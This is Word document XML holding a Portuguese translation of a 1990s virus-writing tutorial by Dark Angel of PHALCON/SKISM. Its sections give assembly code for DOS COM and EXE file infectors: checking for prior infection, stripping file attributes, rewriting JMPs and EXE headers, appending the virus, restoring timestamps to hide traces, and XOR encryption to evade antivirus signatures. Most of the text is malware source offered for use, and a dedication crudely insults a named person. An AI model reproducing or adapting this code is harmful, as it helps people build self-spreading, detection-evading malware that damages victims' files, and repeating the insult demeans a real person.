        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PASSO 3 -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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>CHECANDO PO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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>INFECÇÃ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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>ANTERIO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Todo vírus tem certas características que permitem que você a você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erificar se um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já foi infectado.  Por exemplo, um pedaço de código pode aparece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m um certo lugar.  Ou talvez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instrução JMF estão sempre codificada da mesma forma.  De out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orma, você deve ter certez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e seu vírus possui um marcador, assim múltiplas infecções n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esmo arquivo não ocorrem.  Aqui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tá um exemplo de uma checagem desse tipo (para um infector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quivo COM)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h,3Fh                          ; Lê os primeiros 3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cx, 3                           ; bytes do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lea     dx, [bp+offset buffer]          ; para o buffe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x, 4202h                       ; Procurar o fim do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xor     cx, cx                          ; DX:CX = offset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xor     dx, dx                          ; Retorna o tamanho do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                            ; em DX:AX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sub     ax, virus_size + 3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cmp     word ptr [bp+offset buffer+1], ax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jnz     infect_it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bomb_out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h, 3Eh                         ; senão fecha o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                            ;  e vai procurar outr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Nesse exemplo, BX é assumido para mexer com o arquivo a fim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hecar se foi infectado e s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 o tamanho do vírus é igual ao tamanho do vírus.  Buffer é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ssumido para ser uma área d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 bytes de espaço vazio.  Esse fragmento de código lê os primeiros 3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ytes no buffer e depoi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para a localização do JMP. (localizado no início do Word e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uffer+1) e se o JMP está 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rus_size bytes antes do Fim do arquivo, então o arquivo já está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fectado com esse víru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utro método pode ser procurar em uma certa localização no arquiv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a um byte ou word marcador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or exemplo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h, 3Fh                         ; Le os primeiros 4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cx, 4                           ; bytes do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lea     dx, [bp+offset buffer]          ; no buffer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cmp     byte ptr [buffer+3], infection_id_byte ; Checar o quart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jz      bomb_out                        ; byte para o marcado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infect_it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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PASSO 4 -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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>INFECTAR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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>ARQUIV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Esse é o coração da replicação.  Uma vez que você localizou um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quivo potencial, você dev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alvar os atributos, hora, data e tamanho para uso mais tarde.  A par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baixo é uma explicação do DTA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Offset     Tamanho   O que é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 xml:space="preserve">0h       21 BYTES  Reservado, varias a cada versão do DO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15h       BYTE      Atributo do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16h       WORD      Hora do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18h       WORD      Data do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1Ah       DWORD     Tamanho do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1Eh       13 BYTES  ASCIIZ nome + extensã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Como você pode ver, o DTA contém todas as informações vitai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anto ao arquivo que você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cisa. O código abaixo é um exemplo de como salvar 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formações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lea  si, [bp+offset DTA+15h]            ; Iniciar com atributo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cx, 9                              ; Terminar com tamanh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lea  di, [bp+offset f_attr]             ; Mover para sua localizaçõ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rep  movsb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; Variáves necessária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f_attr  db   ?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f_time  dw   ?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f_date  dw   ?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f_size  dd   ?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Você agora pode mudar os atributos do arquivo para nada através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T 21h/Função 43h/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ubfunção 01h.   Isso é para permitir a infecção de arquivos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istema, escondidas e arquivo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enas de leitura.  Apenas vírus primitivos (ou minímos) nã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fectam esses arquivo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lea  dx, [bp+offset DTA+1eh]            ; DX aponta para nome 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quivo e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ax, 4301h                          ; DT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xor  cx, cx                             ; Limpar atributos do arquivo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21h                                ; Fazer a chamad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Uma vez que os atributos foram aniquilados, você pode abrir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quivo com impunidade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se um acesso em modo ler/escrever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lea  dx, [bp+offset DTA+1eh]            ; Use nome do arquivo n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T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ax, 3d02h                          ; Abrir modo ler/escreve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21h                                ; duh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xchg ax, bx                             ; Acesso é mais útil e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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">; BX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gora nos chegamos na parte que você mais queria: a rotina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fecção.  Eu estou orgulhos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a apresentar códigos que irão fazer a infecção em arquivos COM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hh, você diz, eu poss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azer isso com a informação apresentada na edição anterior.  Ah, m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em muito mais.  Um exempl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 infector de EXE deverá se apresentado rapidamente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 teoria em infectar foi abordada na última edição, então eu nã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vo entrar em detalh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novo.  Aqui está um infector de exemplo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; Exemplo de infector de COM.  Assume que BX possuir o acesso a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; Assume que o arquivo COM passou pelos critérios de infecções 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ão foi infectado aind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h, 3f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lea     dx, [bp+buffer1]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cx, 3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x, 4200h                       ; Move o ponteiro do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xor     cx, cx                          ; para o início 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xor     dx, dx                          ;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byte ptr [bp+buffer2], 0e9h      ; JMP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x, word ptr [bp+f_size]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sub     ax, part1_size                   ; Geralmente 3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word ptr [bp+buffer2+1], ax      ; offset do JMP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; Codificar a instrução JMP para trocar o início do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byte ptr [bp+buffer2], 0e9h      ; JMP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x, word ptr [bp+f_size]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sub     ax, part1_size                   ; Geralmente 3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word ptr [bp+buffer2+1], ax      ; offset de JMP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; Escreve a instrução JMP no início do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h, 40h                          ; Escreve CX bytes par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cx, 3                            ; acessar o BX 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lea     dx, [bp+buffer2]                 ; buffer -&gt; DS:[DX]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mov     ax, 4202h                        ; Move ponteiro do arquiv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xor     cx, cx                           ; o fim do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xor     dx, dx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h, 40h                          ; Escreve CX byt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mov     cx, endofvirus - startofpart2    ; Tamanho efetivo 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íru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lea     dx, [bp+startofpart2]            ; Começa a escrever no iníci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; Variávei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buffer1 db 3 dup (?)                             ; bytes salvos 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">; arquivo infectado para restaura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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">; depoi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buffer2 db 3 dup (?)                             ; buffer Temporári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Depois de alguns exames, esse código irá provar que é fácil de se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tendido.  Isso começ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endo os primeiros 3 bytes em um buffer.  Note que você pode já te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eito isso em um pass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nterior, tipo quando você está checando para uma infecção anterior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 você já fez isso, você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bviamente não precisa fazer isso de novo.  Esse buffer precisa se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mazenado no vírus assi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le pode ser restaurado depois quando o código é executad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Infecções EXE são bem simples, apenas um pouco mais difícil de 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tender.  Primeiro a teori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qui está o formato do cabeçalho EXE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Ofs Nome                      Tamanho   Comentário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00  Signature                    2 bytes   always 4Dh 5Ah (MZ)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*02  Last Page Size          1 word    number of bytes in last pag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*04  File Pages                 1 word    number of 512 byte pag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06  Reloc Items               1 word    number of entries in tabl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08  Header Paras            1 word    size of header in 16 byte para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0A  MinAlloc                  1 word    minimum memory required in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a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0C  MaxAlloc                 1 word    maximum memory wanted in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a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*0E  PreReloc SS            1 word    offset in paras to stack segment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*10  Initial SP                  1 word    starting SP valu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12  Negative checksum   1 word    currently ignored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*14  Pre Reloc IP            1 word    execution start addres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*16  Pre Reloc CS           1 word    preadjusted start segment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18  Reloc table offset      1 word    is offset from start of file)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1A  Overlay number       1 word    ignored if not overlay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1C  Reserved/unused      2 word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* denotes bytes which should be changed by the viru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Para entender  isso, voce deve primeiro entender que arquivos EX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ao estruturados dentr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segmentos.  Estes segmentos podem iniciar e acabar qualque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ugar.  Tudo o que voce tem qu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azer para  infectar um arquivo EXE eh juntar o seu codigo no fim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sso ira entao ser em seu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prio segmento.  Agora tudo que voce tem de fazer eh fazer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digo do virus executar primeir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codigo do programa.  Ao contrado de infeccoes COM,  nenhu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digo do programa eh sobrescrit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ntretanto  o cabecalho eh modificado.   Note que o virus po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ermanecer com a estrutura V1/V2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as apenas V2 precisa ser concatenado no fim do arquivo EX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fectad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Offset 4  (Paginas de Arquivo)  mantém o  tamanho do arquiv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ividido por 512, arredondad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ffset 2 mantem o tamanho do modulo 512 do arquivo.  Offset 0Eh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antem o deslocamento d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grafo (relativo para o fim do cabeçalho) da pilha de segmen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icial e Offset 10h mante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deslocamento (relativo para o inicio do segmento da pilha)  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onteiro de pilha inicial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ffset 16h mantem o deslocamento de paragrafo relativo para o fi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 o cabecalho e offset  14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antem o deslocamento do ponto de entrada relativo ao inicio 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gmento de entrada.  Offset 14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 16h sao a chave para acrescentar o codigo inicial (o virus) para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quiv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ntes de voce  infectar o  arquivo, voce  deve salvar o CS:IP e SS:SP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contrado no cabecalh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E, como  voce precisa restaurar eles durante a execucao.  Note qu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S:SP NÃO é armazenado n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ormato Intel reverse-double-word.  Se voce nao sabe o que eu estou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alando, nao se preocupe;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sso é apenas para pessoas do ramo.  Você deve também salvar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amanho do arquivo pois voce ir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ecisar usar aquele valor muitas vezes durante a rotina de infecca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gora é hora de calcula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lguns offsets!  Para encontrar o novo  CS:IP e SS:SP, use o segui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digo.  Ele assumes qu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 tamanho do arquivo está carregado em DX:AX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mov     bx, word ptr [bp+ExeHead+8]    ; Tamanho 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abeçalho nos paragrafo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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>;  ^---tenha certeza que você não destruirá o acesso a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mov     cl, 4                          ; Multiplicar por 16.  Não funcion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shl     bx, cl                         ; cabeçalhos &gt; 4096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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">; bytes.  Oh well!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sub     ax, bx                         ; Subtrair tamanho do cabeçalho d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sbb     dx, 0                          ; tamanho do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; Agora DX:AX está carregado com tamanho do arquivo menu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amanho do cabeçalh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mov     cx, 10h                        ; DX:AX/CX = AX Remainder DX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div     cx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Esse codigo  eh um tanto ineficiente.  Isso poderá provavelmente se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ais facil para dividi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r 16 primeiro  e então executa uma subtração direta de AX, m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sso parece ser o código qu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u escolhi. Entretanto, esse codigo tem algumas vantagens sobre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ais  eficiente já feit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 esse, você terá certeza que o IP  (em DX)  irá ser entre 15.  Iss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ermite a pilha par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tar no mesmo segmento como o ponto de entrada, tão longo tanto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pontador da pilh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gora AX*16+DX  aponta para o fim do codigo.  Se o virus inici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mediatamente depois do fim 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digo, AX e DX podem ser usados como o CS e IP iniciais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spetivamente.  Entretanto, se  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rus tem algum lixo (codigo ou dados) antes do ponto de entrada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crescente a troca do pont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entrada para DX (nenhum ADX com AX é necessário desde qu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X sejá sempre pequeno)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word ptr [bp+ExeHead+14h], dx  ; IP Offset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mov     word ptr [bp+ExeHead+16h], ax  ; CS Displacement in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odul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The SP  and SS  can now  be calculated.   The  SS is  equal to th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S.  Th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ctual value  of the SP is irrelevant, as long as it is large enough s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h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stack will  not overwrite code (remember: the stack grow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ownwards).  As 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general rule,  make sure the SP is at least 100 bytes larger than th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iru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size.  This should be sufficient to avoid problem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word ptr [bp+ExeHead+0Eh], ax  ; Paragraph disp. S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word ptr [bp+ExeHead+10h], 0A000h ; Starting SP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Tudo o que falta mexer no cabeçalho é o tamanho do arquiv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staure o tamanho do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iginal de  aonde quer que você salvou para DX:AX.  Para calcula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X:AX/512 e DX:AX MOD 512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se o seguinte código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cl, 9                           ; Use shifts again fo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ror     dx, cl                          ; division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push    ax                              ; Need to use AX again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shr     ax, cl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adc     dx, ax                          ; pages in dx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pop     ax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and     ah, 1                           ; mod 512 in ax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word ptr [bp+ExeHead+4], dx     ; Fix-up the file size in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word ptr [bp+ExeHead+2], ax     ; the EXE header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Tudo o que falta é reescrever o cabeçalho EXE e concatenar o víru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o fim do arquivo.  Você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ecisa de código?  Você pega códig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h, 3fh                         ; BX mantém manuseio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mov     cx, 18h                         ; Não precisa de todo o cabeçalh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lea     dx, [bp+ExeHead]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call    infectex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x, 4200h                       ; voltar para o inicio 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xor     cx, cx                          ;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xor     dx, dx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h, 40h                         ; Reescrever cabeçalh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cx, 18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lea     dx, [bp+ExeHead]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x, 4202h                       ; Vai para o fim do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xor     cx, cx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xor     dx, dx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h, 40h                         ; Note: Apenas precisa escreve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cx, part2size                   ;       parte 2 do viru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lea     dx, [bp+offset part2start]      ;      (Partes do viru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                            ;       definido na primeir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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">;       parte 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">;       guia)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Note que esse código sozinho não é suficiente para escrever u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fector de COM ou EXE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ódigo também é necessário para transferir controle para o program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i.  A informaçã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ecessária para fazer esse deve ser apresentada na próxima parte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Nesse meio tempo, você pode tentar deixar do seu modo; apen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embre-se que você dev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staurar tudo o que você mudou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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>PASSO 4 -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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>COBRINDO SEU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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t>RASTR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Esse passo,  embora simples de se fazer, eh muito facilm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quecido.  Isso eh extremament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mportante, como um usuário cauteloso será alertado para a presenç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 um virus por todos a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odificações em um arquivo.   Em sua forma mais simples, iss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volve a restauração d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tributos do arquivo, hora e data.  Isso eh feito com o segui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ódigo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x, 5701h                      ; Mudar arquivo tempo/dat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dx, palavra ptr [bp+f_date]       ; DX = dat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cx, palavra ptr [bp+f_time]       ; CX = temp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h, 3eh                        ; Fechar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x, 4301h                      ; Mudar atributo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lea     dx, [bp+offset DTA + 1Eh]      ; Nome do arquiv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ermanece em DT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xor     ch, c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cl, byte ptr [bp+f_attrib]     ; Atributo em CX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Lembrar tambem para restaurar o diretório de volta para o original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 ele foi altera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quanto o vírus rodav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===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DICATORIA: Isso eh dedicado para Patty Hoffman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aquela gorda puta que nao sabe seu proprio nome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e para os milhoes de idiotas panacas quem esta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amedrontados pelos Michelangelo e por isso eles nao toca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em seus computadores por um dia inteir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GRADECIMENTOS: para todos os membros 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ALCAO/SKISM especialment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Garbageheap, Hellraiser, e Demogorgon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Guia de Criação de Vírus por Dark Angel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"Essa é a coisa certa para fazer"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PARTE III:  VÍRUS NA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RESIDENTES VIRUS, PARTE II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Bem vindo a terceira parte do meu guia de criação de Virus. N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te anterior, eu cobrir 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te primaria do virus - a replicacao.  Como prometi, Eu devo ago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brir  o resto do viru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o residente e  apresentar codigo  que, quando  combinado com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digo da parte anterior, ser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uficiente para permitir a qualquer um escrever um vírus simple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dicionalmente, Eu  irei apresentar algumas dicas e truques qu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ode ajudar para otimisar seu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ódig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 CAMUFLAGE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A camuflagem é a defesa mais usada por escritores de virus par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vitar a deteccao de  viru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rotina mais comum de encriptacao/decriptacao é o XOR, uma vez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e ele é usado tanto par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criptacao e decriptaca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encriptar_val   dw   ?   ; Podera ser em qualquer lugar na áre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criptad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decrypt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encrypt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mov dx, word ptr [bp+encrypt_val]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mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2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lea si, [bp+part_to_encrypt_start]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mov di, si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xor_loop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lodsw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xor ax, dx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stosw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loop xor_loop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 rotina anterior usa uma rotina XOR simples para encriptar ou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criptar codigo na memori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sa é essencialmente a mesmo rotina como aquela na primeira parte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xceto porque essa encript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ords melhor do que bytes. Por isso que ele tem 65,535 mutacoes a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vés de 255 e é tambem dua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ezes mais rapido.  Enquanto essa rotina é simples de se entender, el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ixa muito  para se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sejado já que ela é grande e pode ser usada como uma cadeia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ocura de antivirus.  U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elhor metodo segue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encrypt_val   dw    ?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decrypt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encrypt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mov dx, word ptr [bp+encrypt_val]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lea bx, [bp+part_to_encrypt_start]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mov cx, (part_to_encrypt_end - part_to_encrypt_start + 1) / 2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xor_loop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xor word ptr [bx], dx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add bx, 2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loop xor_loop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Embora esse  codigo eh  muito menor,  é possível reduzir mais seu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amanho.  O melhor meto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h inserir o valores para o valor encriptacao, BX, e CX, isso e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empo de infecçã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decrypt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encrypt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mov bx, 0FFFF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mov cx, 0FFFF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xor_loop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xor word ptr [bx], 0FFFF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add bx, 2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loop xor_loop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Todos os valores denotado  por 0FFFFh podem ser mudad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urante a infeccao para valor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opriados para o arquivo infectado.  Por exemplo, BX deve se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arregado com o offset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part_to_encrypt_start relativo ao inicio do arquivo infecta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anda a rotina deencriptaca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é escrita no arquivo infectad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 vantagem primário do codigo usado acima eh o minimisação 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amanho do código de procur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código de procura pode apenas consistir daquelas porcoes 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digo que remanesce constante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esse  caso, Há apenas tres  ou  quatro bytes consecutivos qu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ermanecem constantes.  Uma vez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e a encriptacao inteira consiste de apenas uma dúzia de bytes,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amanho do códico de procur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é extremamente pequen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Embora o  funcao de encriptacao eh  limpo, talvez o valor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criptação inicial e calculo d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alores subsequentes não é tão lúcido.  O valor inicial para muit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criptações XOR deve ser 0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ocê deve mudar o valor de encriptacao valor  durante o  processo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fecção.  Um valor d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ncriptação aleatorio eh desejável.  O mais simples metodo de obte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m número aleatorio é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ultar o relógio interno.  Um número aleatorio pode se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acilmente obtido com um simpl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ódigo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mov     ah, 2Ch                         ; Pega para mim um númer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leatori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int     21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word ptr [bp+encrypt_val], dx   ;  Pode tambem usa CX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lgum funções de encriptação não facilitam com um valor inicial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.  Por exemplo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um olhda na Whale.  Ele usa o valor do word anterior como u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alor de encriptação.  Ness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sos, simplesmente use um JMP para passar a rotina de decriptaçã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ando codificando o víru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ntretanto, tenha certeza que as infecções pulem para local certo!  Po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xemplo, assim é com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oderá ficar o código para o vírus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org     100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start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jmp     past_encryption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; Insira sua rotina de encriptação aqui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past_encryption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 rotina de encriptacao é a ÚNICA parte do virus que precisa esta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sencriptada.  Atravé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técnicas de mover código, isso eh possivel para copiar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ecanismo de infecçào para a pilh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localização da memoria depois do fim do arquivo e antes da pilha).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udo o que é requiri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ão umas poucas instruções MOVSW e um JMP.  Primeiro a rotin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 encriptacao deve ser copiada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pois escrita, depois decriptada, depois RETornar para o pogram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xemplo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lea si, [bp+encryption_routine]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lea di, [bp+heap]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mov cx, encryption_routine_siz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push si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push cx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rep movsb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lea si, [bp+writing_routine]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mov cx, writing_routine_siz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rep movsb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pop cx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pop si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rep movsb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mov al, 0C3h                             ; Tack on a near return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stosb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call [bp+heap]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Embora muitas  virus, por causa de simplicidade, usa a mesm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otina tanto para encriptaca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anto para decriptacao,  o codigo acima mostra que isso é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mpletamente desnecessari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única modificação do código acima para inclusao de uma rotina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criptação em separado é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pegar os PUSHes e trocar os POPs com os LEA si e MOV cx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propriad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Rotinas de encriptacao originais, mesmo sendo interessantes, pode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ão ser os melhore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otinas de encriptação roubadas são as melhores, especialm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quelas roubadas de programa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hareware encriptados!  Sydex é notorio ao usar encriptação em seu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ogramas shareware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uma olhada em programas shareware com encriptação fraca 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inta-se livre para copia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le para você mesmo.  Esperançosamente, os desenvolvedores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nti-virus irão criar um cadei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procura cadeia que ira detectar infeccao pelo seu virus e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odutos shareware simplesment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orque a encriptacao é o mesm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Note que isso não é um  tratamento completo de rotinas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amuflagem.  Um arquivo de text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pleto pode ser escrito apenas sobre técnic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criptacao/decriptacao.  Essa é apenas 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orma mais simples de todas as rotinas possíveis de técnic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criptação e há muitas mai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écnicas de camuflagens disponíveis.  Entretanto, para o iniciante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se deve satisfazer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O DESPACHA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O despachante é a porção do virus que restaura o controle para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ograma infectado.  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spachantes  para arquivos EXE  e  COM  arquivos  são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aturalmente, diferente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Em arquivos COM, você deve restaurar  os bytes que fora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obreescritos pelo seu virus e  enta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ansferir controle para CS:100h,  que eh onde todos arquivos CO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ão carregados inicialmente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RestoreCOM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mov di, 100h                     ; Nos estamos copiando para o inici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lea si, [bp+savebuffer]          ; Nos estamos copiando de noss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uffe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push di                          ; Salva offset para retorno (100h)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movsw                            ; Mais eficiente do que mov cx, 3, movsb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movsb                            ; Alterar para encontrar suas necessidad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retn                             ; Um JMP também irá funciona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rquivos EXE requerem simplesmente a restauração do segmen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a pilha/apontador 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o segmento de codigo/apontador da instruca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ExeReturn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ax, es                           ; Inicia no segmento PSP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add     ax, 10h                          ; Pula o PSP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add     word ptr cs:[bp+ExeWhereToJump+2], ax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cli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add     ax, word ptr cs:[bp+StackSave+2] ; Restaura a pilh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ss, ax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sp, word ptr cs:[bp+StackSave]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sti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db      0eah                             ; JMP FAR PTR SEG:OFF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ExeWhereToJump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dd      0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StackSave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dd      0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ExeWhereToJump2 dd 0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StackSave2      dd 0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Depois da infeccao, os  CS:IP  e  SS:SP iniciais devem se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mazenados em ExeWhereToJump2 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tackSave2, respectivamente.  Eles deve entao ser movido pa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xeWhereToJump e StackSave ant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 restauracao do programa.  Esse restauracao pode ser facilm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alizada com um serie d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struções MOVSW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lguns gostam de limpar todos as prioridades dos registradores pa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 JMP/RET, i.e. el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ruem um grupo  de instruções XOR.  Se voce se sente feliz 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seja desperdicar espaço codig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, voce é bem vindo para fazer isso, mas isso é desnecessario e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uitos caso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A BOMB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"O horror!  O horror!"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- Joseph Conrad, O Coracao da Escurida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O que vai passa atraves da mente de um humilde usuário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mputador quando um virus ativa-se?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e terrores que a vítima passa quando o computador de repente toc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ma música Nazista?  Quant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or de cabeça deve ser a perda de milhares de horas de trabalho e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m instante!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tualmente, Eu nao suporto destruição de dados e discos exagerad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elos virus.  Fazer iss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ão tem propósito e geralmente  mostra pouca imaginacao.  Po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xemplo, o virus mais famos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o mundo Michelangelo não faz nada mais do que sobreescreve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tores do  drive com  dados pego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posições aleatorias da memória.  Que original.  Uau.  É claro,  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ocê é um maniáco e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struição, vá adiante e destrua tudo que você quiser, mas apen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embre-se que essa parte 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rus é geralmente a unica parte vista pelos usuários finais e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istinguir de outro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s melhores exemplos em ordem cronológica incluem: Ambulanc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ar, Cascata, Ping Pong, e Zer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unt.  Nao esqueca a linha PHALCON/SKISM, especialm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quelas feitos por mim!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Como você pode ver, não código para ser mostrado nessa seca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ma vez que todas as bomba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vem ser originais, não há sentido por o codigo de uma.  É claro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lguns virus nao contenha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alquer bomba para eu mostrar aqui.  Geralmente falando, apen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queles com tamanho acima d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500 bytes tem bomba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Não é vantagem de nao ter um bomba outra do que a consideraçã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o tamanh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MEA CULP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Eu venho informar a voce que aquele infector EXE apresentado n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última parte não é totalment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erfeito.  Eu admito isso.  Eu fiz um erro proporções colossais. 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alculo do tamanho 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rquivo tamanho e tamanho do arquivo mod 512 foi mostrado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ma forma errada.  Aqui está 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ersão correta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; Na entrada, DX:AX mantem o NOVO tamanho do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push    ax                          ; Salva low word do tamanho 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mov     cl, 9                       ; 2^9 = 512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shr     ax, cl                      ; / 512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ror     dx, cl                      ; / 512 (tipo de)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stc                                 ; Checar descrição do cabeçalho EX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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">; para explicacao da adica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adc     dx, ax                      ; de 1 para a DIV 512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pop     ax                          ; Restaura low word do tamanho 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and     ah, 1                       ; MOD 512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Esse resultados do tamanho do arquivo / 512 + 1 em DX e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amanho do arquivo mod 512 em AX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resto permanece  o mesmo.  Teste sua rotina de infecção EXE co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 ELO.EXE da Microsoft, um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e ele nao roda a menos que infecção EXE eh perfeit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DICAS E TRUQUE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Então agora todas as partes do vírus nao residente foram coberta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u deixei muito mai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paço que sobraram para serem preenchidos.  Assim, Eu dev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presentar muitas técnicas simpl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e qualquer um pode incorporar dentro do virus para melhorar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ficienci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1.    Use o pilh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A pilha é a área da memoria entre o fim do codigo e o fim d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ilha.  Esse pode se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 xml:space="preserve">convenientemente tratado como uma área de dados de um víru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o mover variaveis para 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ilha, o virus não precisa manter variaveis em seu codigo, reduzin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ssim seu tamanh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ote que desde que o conteudo da pilha nao são parte do virus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penas variávei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emporárias variaveis devem ser mantidas lá, i.e. a rotina de infecca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ão deve conta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om a pilha como parte do vírus já que ela pode derrotar o propósi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 seu us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 xml:space="preserve">Aqui estão dois modos de usar a pilha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; Primeiro meto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EndOfVirus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Variable1 equ $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Variable2 equ Variable1 + LengthOfVariable1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Variable3 equ Variable2 + LengthOfVariable2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Variable4 equ Variable3 + LengthOfVariable3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; Exemplo do primeiro meto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EndOfVirus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StartingDirectory = $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TemporaryDTA      = StartingDirectory + 64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FileSize          = TemporaryDTA + 42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Flag              = FileSize + 4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; Segundo meto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EndOfVirus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Variable1 db LengthOfVariable1 dup (?)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Variable2 db LengthOfVariable2 dup (?)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Variable3 db LengthOfVariable3 dup (?)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Variable4 db LengthOfVariable4 dup (?)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; Exemplo de segundo meto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EndOfVirus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StartingDirectory db 64 dup (?)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TemporaryDTA      db 42 dup (?)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FileSize          dd ?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Flag              db ?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Os dois metodos diferem  ligeiramente.  Ao usar primeir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etodo, voce cria um  arqu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e ira ter o tamanho exato do virus (mais o código do início)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tretanto, quan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ferenciando as variáveis, especificações de tamanho tais com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YTE PTR, WORD PTR, DWORD PTR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tc. deve sempre ser usado  ou o assembler ficará confuso.  E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gundo lugar, se as variávei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cisam ser rearranjadas por alguma razao, o código inteiro EQUate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rá destruido e deve se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feito.   Virus codificados com o segundo metodo não precisam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pecificações de tamanho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as o arquivo resultante deverá ser maior do que o tamanho do víru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tual.  Enquanto que ess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ão eh normalmente um problema, dependendo da checagem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infeccao, o virus pode infectar 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rquivo original quando for rodar.  Esse não é um grande defeito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pecialmente consideran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s vantagens desse metod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Em qualquer  caso, o  uso da pilha pode grandemente diminuir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amanho efetivo do códig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o virus codigo e assim deixar ainda mais eficiente.  A única cois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e deve ser observada é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ando se for infectar arquivos COM grande onde a irá voltar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olta para o offset 0 do mesm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gmento, corrompendo o PSP.  Entretanto, esse problema é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acilmente evitado.  Quan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r se um arquivo COM arquivo eh muito grande para se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fectado por esse razao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implesmente acrescente o tamanho da variável temporária para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amanho do virus com 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opositos de checar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2.   Use procedimento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Procedimentos são úteis na redução do tamanho do vírus, o qu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h sempre um objetiv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sejável.  Apenas use procedimentos se eles salvmr espaco.  Pa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terminar a quantidade d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ytes salvos pelo uso usa de um procedimento, use a segui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ormula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Deixe PS = tamanho do procedimento tamanho, em byt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bytes salvos = (PS - 4) * número invocacoes - P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Por exemplo, o procedimento de fechar arquivo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close_file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 xml:space="preserve">mov ah, 3eh      ; 2 byt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 xml:space="preserve">int 21h          ; 2 byt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 xml:space="preserve">ret              ; 1 byt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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="pt-BR"/>
        </w:rPr>
        <w:t xml:space="preserve">; PS = 2+2+1 = 5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eh apenas  viavel se isso for usado 6 ou mais vezes, com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5-4)*6 - 5 = 1.  Um grand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alvamento de um (1) byte!  Uma vez que nenhum vírus fecha u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quivo em seis lugares diferent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,  o procedimento de fechar arquivo é claramente  inútil e deve se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vitad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Sempre que  possivel,  desenhe os procedimentos para  ser o mai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lexivel quanto possível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sa é a razão chefe porque a codificação Bulgariana é tão tens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penas de uma olhada na font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Creeping Death.  Por exemplo, o procedimento de apontar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over arquivo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go_eof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 xml:space="preserve">mov al, 2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move_fp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 xml:space="preserve">xor dx, dx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go_somewhere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 xml:space="preserve">xor cx, cx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 xml:space="preserve">mov ah, 42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 xml:space="preserve">int 21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 xml:space="preserve">ret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A funcao foi feita com flexibilidade em mente.  Com uma CALL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a o go_eof, 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cedimento ira mover o  apontador de arquivo para o fim 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quivo.   Um CALL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move_fp  com AL setado em 0, o apontador do arquiv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pontador será reiniciado.  Uma CALL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go_somewhere com DX e AL declarado, o apontador do arquiv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ode ser movido para qualque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ugar dentro do arquivo.  Se o  funcao eh usada pesadamente, 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alvamentos podem ser enorme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3.   Use um bom assembler e debugge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O melhor assembler que eu já vi foi o Turbo Assembler.  El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mpila muito rapidamente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se a opção /m2 para eliminar todos  os NOPs  do  codigo.  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antagens sao obvias - rapi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senvolvimento e pequeno codig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O melhor  debugador 